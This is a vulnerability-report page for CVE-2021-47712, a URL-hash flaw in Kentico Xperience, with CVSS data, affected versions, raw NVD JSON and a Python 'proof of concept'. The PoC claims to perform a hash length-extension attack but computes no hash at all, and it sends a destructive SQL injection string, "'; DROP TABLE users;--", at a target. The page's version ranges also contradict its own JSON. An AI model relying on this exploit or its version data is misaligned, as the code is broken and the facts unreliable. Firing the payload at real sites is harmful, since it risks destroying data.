Security Vulnerability Report
CVE-2021-47712 CVSS 7.5 HIGH

CVE-2021-47712

Published: 2025-12-18 20:15:50
Last Modified: 2025-12-24 18:14:47

Description

A cryptography vulnerability in Kentico Xperience allows attackers to potentially manipulate URL hash values through existing hashing mechanisms. The hotfix introduces an additional security layer to prevent hash value reuse and potential exploitation.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:kentico:xperience:*:*:*:*:*:*:*:* - VULNERABLE
Kentico Xperience < 13.0.200
Kentico Xperience < 12.0.150
All Kentico Xperience versions that use the default hashing mechanism

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2021-47712 PoC - Kentico Xperience URL Hash Manipulation
# This PoC demonstrates the hash length extension attack concept
import hashlib
import hmac
import requests


def generate_hash_extension(original_message, original_hash, secret_length, additional_data):
    """
    Generate a valid hash for an extended message without knowing the secret.
    This exploits the weakness of a naive keyed hash of the form
    hash(secret + message), which is not a true HMAC construction.
    """
    # In a real attack, this would use specific tools like hashpump.
    # This conceptual version computes nothing: it only places the
    # original hash on a URL that carries different data.
    # For demonstration: create a forged request
    forged_url = f"https://target-site.com/api/endpoint?data={additional_data}&hash={original_hash}"
    return forged_url


def exploit_cve_2021_47712(target_url, known_param):
    """
    Exploit URL hash manipulation vulnerability
    """
    headers = {
        'User-Agent': 'Mozilla/5.0 (PoC for CVE-2021-47712)'
    }

    # Step 1: Get the original hash from a known URL
    response = requests.get(target_url, headers=headers)
    original_hash = response.headers.get('X-Hash', '')

    # Step 2: Generate extended hash using length extension attack
    # Assuming we know the secret length through oracle or guessing
    secret_length = 16  # Example length
    forged_url = generate_hash_extension(
        known_param,
        original_hash,
        secret_length,
        "'; DROP TABLE users;--"  # Malicious payload
    )

    # Step 3: Send the forged request
    exploit_response = requests.get(forged_url, headers=headers)
    return exploit_response.status_code, forged_url


# Note: This is a conceptual PoC. Actual exploitation requires:
# 1. Identifying the vulnerable endpoint
# 2. Determining the hash algorithm used
# 3. Knowing or guessing the secret length
# 4. Crafting appropriate payloads based on the attack goal

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2021-47712", "sourceIdentifier": "[email protected]", "published": "2025-12-18T20:15:49.810", "lastModified": "2025-12-24T18:14:46.850", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A cryptography vulnerability in Kentico Xperience allows attackers to potentially manipulate URL hash values through existing hashing mechanisms. The hotfix introduces an additional security layer to prevent hash value reuse and potential exploitation."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": 
"NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-327"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kentico:xperience:*:*:*:*:*:*:*:*", "versionEndIncluding": "12.0.102", "matchCriteriaId": "D41980CD-D4C7-431E-82AE-BB32213AF092"}]}]}], "references": [{"url": "https://devnet.kentico.com/download/hotfixes", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/kentico-xperience-url-hashing-cryptography-vulnerability", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}